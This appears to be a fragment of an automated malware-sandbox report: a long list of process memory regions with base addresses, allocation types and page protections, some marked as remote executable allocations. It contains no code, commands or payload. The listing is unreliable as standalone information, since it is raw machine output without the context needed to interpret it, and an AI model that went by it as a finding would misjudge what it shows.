page execute and read and write
|
||
20E80000
|
direct allocation
|
page read and write
|
||
8010000
|
trusted library allocation
|
page read and write
|
||
58E1000
|
heap
|
page read and write
|
||
2109EEBC000
|
heap
|
page read and write
|
||
210A097F000
|
heap
|
page read and write
|
||
210A14B0000
|
heap
|
page read and write
|
||
5925000
|
heap
|
page read and write
|
||
6C90000
|
direct allocation
|
page read and write
|
||
8640000
|
direct allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
20EDC000
|
stack
|
page read and write
|
||
6FC33FF000
|
stack
|
page read and write
|
||
1DEDC043000
|
trusted library allocation
|
page read and write
|
||
206E0000
|
direct allocation
|
page read and write
|
||
7F10000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF3E74000
|
heap
|
page read and write
|
||
29D9000
|
unkown
|
page read and write
|
||
210A0978000
|
heap
|
page read and write
|
||
210A0971000
|
heap
|
page read and write
|
||
206C0000
|
direct allocation
|
page read and write
|
||
45DE000
|
stack
|
page read and write
|
||
2A00000
|
heap
|
page read and write
|
||
1DEF41A7000
|
heap
|
page read and write
|
||
45F1000
|
trusted library allocation
|
page read and write
|
||
2CE3000
|
trusted library allocation
|
page execute and read and write
|
||
58E4000
|
heap
|
page read and write
|
||
58CD000
|
heap
|
page read and write
|
||
6C30000
|
direct allocation
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
70F2000
|
heap
|
page read and write
|
||
74E0000
|
trusted library allocation
|
page read and write
|
||
2C2F000
|
stack
|
page read and write
|
||
6C50000
|
direct allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
20710000
|
direct allocation
|
page read and write
|
||
76F6CBF000
|
stack
|
page read and write
|
||
29EB000
|
unkown
|
page read and write
|
||
73A0000
|
trusted library allocation
|
page read and write
|
||
2109EF2C000
|
heap
|
page read and write
|
||
1DEF41C7000
|
heap
|
page read and write
|
||
1DEF3F22000
|
heap
|
page read and write
|
||
6FC36FE000
|
stack
|
page read and write
|
||
7F60000
|
heap
|
page read and write
|
||
210A09BE000
|
heap
|
page read and write
|
||
704E000
|
stack
|
page read and write
|
||
1DEDB975000
|
heap
|
page read and write
|
||
2109EEF5000
|
heap
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
8020000
|
trusted library allocation
|
page read and write
|
||
2109EF71000
|
heap
|
page read and write
|
||
5657000
|
trusted library allocation
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEF412C000
|
heap
|
page read and write
|
||
1DEDC047000
|
trusted library allocation
|
page read and write
|
||
6CEE000
|
stack
|
page read and write
|
||
8630000
|
direct allocation
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDBD47000
|
trusted library allocation
|
page read and write
|
||
5185000
|
remote allocation
|
page execute and read and write
|
||
20730000
|
direct allocation
|
page read and write
|
||
2A61000
|
heap
|
page read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
76F677C000
|
stack
|
page read and write
|
||
8550000
|
trusted library allocation
|
page read and write
|
||
210A0988000
|
heap
|
page read and write
|
||
2CF0000
|
trusted library allocation
|
page read and write
|
||
6A10000
|
heap
|
page execute and read and write
|
||
755B000
|
stack
|
page read and write
|
||
2700000
|
trusted library allocation
|
page read and write
|
||
1DEDDC3E000
|
trusted library allocation
|
page read and write
|
||
76F6AB9000
|
stack
|
page read and write
|
||
8680000
|
direct allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
8600000
|
trusted library allocation
|
page read and write
|
||
1DEDDD21000
|
trusted library allocation
|
page read and write
|
||
4749000
|
trusted library allocation
|
page read and write
|
||
20D4D000
|
stack
|
page read and write
|
||
45E0000
|
heap
|
page read and write
|
||
206B0000
|
direct allocation
|
page read and write
|
||
2109EF2E000
|
heap
|
page read and write
|
||
1DEEBE09000
|
trusted library allocation
|
page read and write
|
||
29DF000
|
unkown
|
page read and write
|
||
2109EE80000
|
heap
|
page read and write
|
||
76F6BBE000
|
stack
|
page read and write
|
||
206A0000
|
direct allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
210A1226000
|
heap
|
page read and write
|
||
5619000
|
trusted library allocation
|
page read and write
|
||
20F9E000
|
stack
|
page read and write
|
||
8080000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
210A14B1000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
27D0000
|
heap
|
page readonly
|
||
2109EEE9000
|
heap
|
page read and write
|
||
1DEF415E000
|
heap
|
page read and write
|
||
708E000
|
stack
|
page read and write
|
||
2109EF03000
|
heap
|
page read and write
|
||
1DED9EB5000
|
heap
|
page read and write
|
||
210A0974000
|
heap
|
page read and write
|
||
76F6B37000
|
stack
|
page read and write
|
||
1DEDA080000
|
trusted library allocation
|
page read and write
|
||
1DED9EEF000
|
heap
|
page read and write
|
||
8352000
|
heap
|
page read and write
|
||
2109EF1B000
|
heap
|
page read and write
|
||
210A09AB000
|
heap
|
page read and write
|
||
8040000
|
trusted library allocation
|
page read and write
|
||
832C000
|
heap
|
page read and write
|
||
76F6C3E000
|
stack
|
page read and write
|
||
1DEDC54F000
|
trusted library allocation
|
page read and write
|
||
20C3E000
|
stack
|
page read and write
|
||
8000000
|
trusted library allocation
|
page read and write
|
||
6E3C000
|
stack
|
page read and write
|
||
6C2B000
|
stack
|
page read and write
|
||
2109EF31000
|
heap
|
page read and write
|
||
2109EE89000
|
heap
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
8314000
|
heap
|
page read and write
|
||
820C000
|
stack
|
page read and write
|
||
2109EE30000
|
heap
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
565F000
|
trusted library allocation
|
page read and write
|
||
2713000
|
trusted library allocation
|
page execute and read and write
|
||
1DEDA0B0000
|
heap
|
page read and write
|
||
1DEDD63B000
|
trusted library allocation
|
page read and write
|
||
7470000
|
trusted library allocation
|
page read and write
|
||
737E000
|
stack
|
page read and write
|
||
20DF0000
|
remote allocation
|
page read and write
|
||
20D8E000
|
stack
|
page read and write
|
||
74D0000
|
trusted library allocation
|
page read and write
|
||
29F1000
|
unkown
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
1DEDB8E0000
|
trusted library allocation
|
page read and write
|
||
6D2A000
|
stack
|
page read and write
|
||
7430000
|
trusted library allocation
|
page read and write
|
||
21241000
|
trusted library allocation
|
page read and write
|
||
1DEDA0A0000
|
trusted library allocation
|
page read and write
|
||
2109EF30000
|
heap
|
page read and write
|
||
1DED9F10000
|
heap
|
page read and write
|
||
85FE000
|
stack
|
page read and write
|
||
210A098E000
|
heap
|
page read and write
|
||
210A097A000
|
heap
|
page read and write
|
||
76F6A37000
|
stack
|
page read and write
|
||
6D6E000
|
stack
|
page read and write
|
||
6FC35FE000
|
stack
|
page read and write
|
||
7F00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
565E000
|
stack
|
page read and write
|
||
6B5E000
|
stack
|
page read and write
|
||
7EE7000
|
stack
|
page read and write
|
||
2109EEEA000
|
heap
|
page read and write
|
||
1DEDC03F000
|
trusted library allocation
|
page read and write
|
||
1DEF413A000
|
heap
|
page read and write
|
||
82AC000
|
stack
|
page read and write
|
||
1DEDD46B000
|
trusted library allocation
|
page read and write
|
||
4598000
|
heap
|
page read and write
|
||
76F780D000
|
stack
|
page read and write
|
||
76F67FE000
|
stack
|
page read and write
|
||
2A20000
|
heap
|
page read and write
|
||
2109EEEF000
|
heap
|
page read and write
|
||
6DFE000
|
stack
|
page read and write
|
||
8560000
|
trusted library allocation
|
page read and write
|
||
2CED000
|
trusted library allocation
|
page execute and read and write
|
||
210A1080000
|
heap
|
page read and write
|
||
1DEDD44E000
|
trusted library allocation
|
page read and write
|
||
6FC39FF000
|
stack
|
page read and write
|
||
591E000
|
heap
|
page read and write
|
||
20FDE000
|
stack
|
page read and write
|
||
69FE000
|
stack
|
page read and write
|
||
7FBF000
|
stack
|
page read and write
|
||
74F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page execute and read and write
|
||
210A0F6D000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
8318000
|
heap
|
page read and write
|
||
2109EE40000
|
heap
|
page read and write
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
1DEF3EB0000
|
heap
|
page read and write
|
||
2109EEEA000
|
heap
|
page read and write
|
||
20740000
|
direct allocation
|
page read and write
|
||
1DEEBE18000
|
trusted library allocation
|
page read and write
|
||
76F778E000
|
stack
|
page read and write
|
||
724C000
|
heap
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
76F62E3000
|
stack
|
page read and write
|
||
802F000
|
trusted library allocation
|
page read and write
|
||
2D40000
|
heap
|
page readonly
|
||
210A097E000
|
heap
|
page read and write
|
||
7390000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
76F6978000
|
stack
|
page read and write
|
||
20700000
|
direct allocation
|
page read and write
|
||
21230000
|
heap
|
page read and write
|
||
7500000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
2109EF21000
|
heap
|
page read and write
|
||
76F6D3E000
|
stack
|
page read and write
|
||
700E000
|
stack
|
page read and write
|
||
27BE000
|
stack
|
page read and write
|
||
6DAB000
|
stack
|
page read and write
|
||
6FC34FE000
|
stack
|
page read and write
|
||
7F70000
|
heap
|
page read and write
|
||
8320000
|
heap
|
page read and write
|
||
7460000
|
trusted library allocation
|
page read and write
|
||
2109EF11000
|
heap
|
page read and write
|
||
8660000
|
direct allocation
|
page read and write
|
||
1DED9E10000
|
heap
|
page read and write
|
||
2109EEE4000
|
heap
|
page read and write
|
||
20B7D000
|
stack
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
850E000
|
stack
|
page read and write
|
||
1DED9F51000
|
heap
|
page read and write
|
||
2109EEBC000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
826E000
|
stack
|
page read and write
|
||
71F9000
|
heap
|
page read and write
|
||
1DEDBB21000
|
trusted library allocation
|
page read and write
|
||
7FFD9B967000
|
trusted library allocation
|
page read and write
|
||
2D10000
|
trusted library allocation
|
page read and write
|
||
4550000
|
heap
|
page execute and read and write
|
||
74C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
1DEDB910000
|
heap
|
page read and write
|
||
210A097B000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
210A0E4A000
|
heap
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
58E4000
|
heap
|
page read and write
|
||
7510000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
20E90000
|
direct allocation
|
page read and write
|
||
8CB0000
|
direct allocation
|
page execute and read and write
|
||
1DEDCA62000
|
trusted library allocation
|
page read and write
|
||
20690000
|
direct allocation
|
page read and write
|
||
210A098D000
|
heap
|
page read and write
|
||
210A0972000
|
heap
|
page read and write
|
||
6FC2D7A000
|
stack
|
page read and write
|
||
76F69BE000
|
stack
|
page read and write
|
||
20CBE000
|
stack
|
page read and write
|
||
8620000
|
direct allocation
|
page read and write
|
||
1DEF4020000
|
heap
|
page read and write
|
||
591B000
|
heap
|
page read and write
|
||
2109EF21000
|
heap
|
page read and write
|
||
206D0000
|
direct allocation
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
561E000
|
unkown
|
page read and write
|
||
6BED000
|
stack
|
page read and write
|
||
210A0AF0000
|
heap
|
page read and write
|
||
6F70000
|
direct allocation
|
page read and write
|
||
1DED9E60000
|
heap
|
page read and write
|
||
4785000
|
remote allocation
|
page execute and read and write
|
||
2109EEAE000
|
heap
|
page read and write
|
||
76F788B000
|
stack
|
page read and write
|
||
1DED9EC7000
|
heap
|
page read and write
|
||
8185000
|
trusted library allocation
|
page read and write
|
||
2109EEF2000
|
heap
|
page read and write
|
||
6C80000
|
direct allocation
|
page read and write
|
||
7201000
|
heap
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDC05D000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
74B0000
|
trusted library allocation
|
page read and write
|
||
2AD1000
|
heap
|
page read and write
|
||
1DEDC1C6000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
20BFD000
|
stack
|
page read and write
|
||
1DEDBAF0000
|
heap
|
page execute and read and write
|
||
20DF0000
|
remote allocation
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
2CAE000
|
stack
|
page read and write
|
||
1DEDD5FF000
|
trusted library allocation
|
page read and write
|
||
210A097E000
|
heap
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDDC2D000
|
trusted library allocation
|
page read and write
|
||
76F66FF000
|
stack
|
page read and write
|
||
1DEDCA4A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
584F000
|
stack
|
page read and write
|
||
55DE000
|
unkown
|
page read and write
|
||
210A0993000
|
heap
|
page read and write
|
||
210A09B2000
|
heap
|
page read and write
|
||
666E000
|
stack
|
page read and write
|
||
1DEF3F18000
|
heap
|
page read and write
|
||
1DEEBB21000
|
trusted library allocation
|
page read and write
|
||
1DEDB98A000
|
heap
|
page read and write
|
||
1DEF4100000
|
heap
|
page read and write
|
||
210A108D000
|
heap
|
page read and write
|
||
210A0978000
|
heap
|
page read and write
|
||
29E2000
|
unkown
|
page read and write
|
||
45E8000
|
heap
|
page read and write
|
||
6A15000
|
heap
|
page execute and read and write
|
||
742D000
|
stack
|
page read and write
|
||
2109EF7B000
|
heap
|
page read and write
|
||
2109EF06000
|
heap
|
page read and write
|
||
5675000
|
heap
|
page read and write
|
||
210A099B000
|
heap
|
page read and write
|
||
210A0975000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FF0000
|
trusted library allocation
|
page read and write
|
||
210A09A3000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
210A097E000
|
heap
|
page read and write
|
||
7F5D000
|
stack
|
page read and write
|
||
58DF000
|
heap
|
page read and write
|
||
6EB0000
|
heap
|
page read and write
|
||
1DEDA0B5000
|
heap
|
page read and write
|
||
58AE000
|
heap
|
page read and write
|
||
82D0000
|
heap
|
page read and write
|
||
7DF485AC0000
|
trusted library allocation
|
page execute and read and write
|
||
82F0000
|
heap
|
page read and write
|
||
1DEDC2A0000
|
trusted library allocation
|
page read and write
|
||
20C70000
|
trusted library allocation
|
page read and write
|
||
1DEDC56F000
|
trusted library allocation
|
page read and write
|
||
29EE000
|
unkown
|
page read and write
|
||
210A097E000
|
heap
|
page read and write
|
||
6A9E000
|
stack
|
page read and write
|
||
210A09A6000
|
heap
|
page read and write
|
||
20AA0000
|
heap
|
page read and write
|
||
210A0970000
|
heap
|
page read and write
|
||
1DEF4133000
|
heap
|
page read and write
|
||
210A0F69000
|
heap
|
page read and write
|
||
1DEDC03B000
|
trusted library allocation
|
page read and write
|
||
5921000
|
heap
|
page read and write
|
||
1DEDCA35000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDB970000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
76F6DBC000
|
stack
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
8030000
|
trusted library allocation
|
page read and write
|
||
6C70000
|
direct allocation
|
page read and write
|
||
82C0000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF4198000
|
heap
|
page read and write
|
||
58E4000
|
heap
|
page read and write
|
||
2109EEEF000
|
heap
|
page read and write
|
||
21030000
|
heap
|
page read and write
|
||
20F5E000
|
stack
|
page read and write
|
||
1DEDBAE7000
|
heap
|
page execute and read and write
|
||
29E8000
|
unkown
|
page read and write
|
||
8670000
|
direct allocation
|
page read and write
|
||
71E9000
|
heap
|
page read and write
|
||
1DED9EAB000
|
heap
|
page read and write
|
||
210A09A6000
|
heap
|
page read and write
|
||
5660000
|
heap
|
page read and write
|
||
7FCD0000
|
trusted library allocation
|
page execute and read and write
|
||
854D000
|
stack
|
page read and write
|
||
2109EF7A000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page read and write
|
||
20AFE000
|
stack
|
page read and write
|
||
20DF0000
|
remote allocation
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
6A5F000
|
stack
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
1DEDCA70000
|
trusted library allocation
|
page read and write
|
||
5932000
|
heap
|
page read and write
|
||
27C9000
|
heap
|
page read and write
|
||
8690000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
2109EF31000
|
heap
|
page read and write
|
||
5670000
|
heap
|
page read and write
|
||
8570000
|
heap
|
page read and write
|
||
72E0000
|
heap
|
page execute and read and write
|
||
1DEDC107000
|
trusted library allocation
|
page read and write
|
||
2D12000
|
trusted library allocation
|
page read and write
|
||
1DEDDC14000
|
trusted library allocation
|
page read and write
|
||
2109EF18000
|
heap
|
page read and write
|
||
1DED9EAD000
|
heap
|
page read and write
|
||
4568000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
662C000
|
stack
|
page read and write
|
||
2109EF4D000
|
heap
|
page read and write
|
||
210A0976000
|
heap
|
page read and write
|
||
723F000
|
heap
|
page read and write
|
||
20E6F000
|
stack
|
page read and write
|
||
2D0A000
|
trusted library allocation
|
page execute and read and write
|
||
210A0977000
|
heap
|
page read and write
|
||
210A0972000
|
heap
|
page read and write
|
||
97D5000
|
direct allocation
|
page execute and read and write
|
||
8309000
|
heap
|
page read and write
|
||
1DEDBB10000
|
heap
|
page execute and read and write
|
||
1DEDA040000
|
heap
|
page read and write
|
||
1DEDC0E1000
|
trusted library allocation
|
page read and write
|
||
76F667E000
|
stack
|
page read and write
|
||
1DEF3E60000
|
heap
|
page read and write
|
||
2109EF42000
|
heap
|
page read and write
|
||
6C60000
|
direct allocation
|
page read and write
|
||
1DEF3FF0000
|
heap
|
page read and write
|
||
1DEDB8A0000
|
trusted library allocation
|
page read and write
|
||
206F0000
|
direct allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
210A0996000
|
heap
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
1DEEBE28000
|
trusted library allocation
|
page read and write
|
||
76F63EE000
|
stack
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
2109EEEB000
|
heap
|
page read and write
|
||
1DEDDC3A000
|
trusted library allocation
|
page read and write
|
||
2D6B000
|
heap
|
page read and write
|
||
5860000
|
heap
|
page read and write
|
||
1DED9EA6000
|
heap
|
page read and write
|
||
5947000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
20CFF000
|
stack
|
page read and write
|
||
8650000
|
direct allocation
|
page read and write
|
||
210A099F000
|
heap
|
page read and write
|
||
76F687E000
|
stack
|
page read and write
|
||
2109EF37000
|
heap
|
page read and write
|
||
2CE4000
|
trusted library allocation
|
page read and write
|
||
29DC000
|
unkown
|
page read and write
|
||
1DED9EF4000
|
heap
|
page read and write
|
||
210A0980000
|
heap
|
page read and write
|
||
20720000
|
direct allocation
|
page read and write
|
||
27C5000
|
heap
|
page read and write
|
||
7EF0000
|
trusted library allocation
|
page read and write
|
||
1DEDC4BE000
|
trusted library allocation
|
page read and write
|
||
2109F170000
|
heap
|
page read and write
|
||
1DEDDC18000
|
trusted library allocation
|
page read and write
|
||
4590000
|
heap
|
page read and write
|
||
2AAD000
|
heap
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
733E000
|
stack
|
page read and write
|
||
1DED9E00000
|
heap
|
page read and write
|
||
2109EEA8000
|
heap
|
page read and write
|
||
2109EF29000
|
heap
|
page read and write
|
||
A1D5000
|
direct allocation
|
page execute and read and write
|
||
2109EEF5000
|
heap
|
page read and write
|
||
2D00000
|
trusted library allocation
|
page read and write
|
||
210A0983000
|
heap
|
page read and write
|
||
1DED9E77000
|
heap
|
page read and write
|
||
7FE0000
|
trusted library allocation
|
page read and write
|
||
1DEF41D0000
|
heap
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
1DEF4024000
|
heap
|
page read and write
|
||
1DEDD168000
|
trusted library allocation
|
page read and write
|
||
1DEF3F56000
|
heap
|
page read and write
|
||
2109EF30000
|
heap
|
page read and write
|
||
2CB0000
|
trusted library section
|
page read and write
|
||
6B1E000
|
stack
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
1DEDC02E000
|
trusted library allocation
|
page read and write
|
||
1DEF41C2000
|
heap
|
page read and write
|
||
2D50000
|
trusted library allocation
|
page execute and read and write
|
||
6FC30FE000
|
stack
|
page read and write
|
There are 524 hidden memdumps, click here to show them.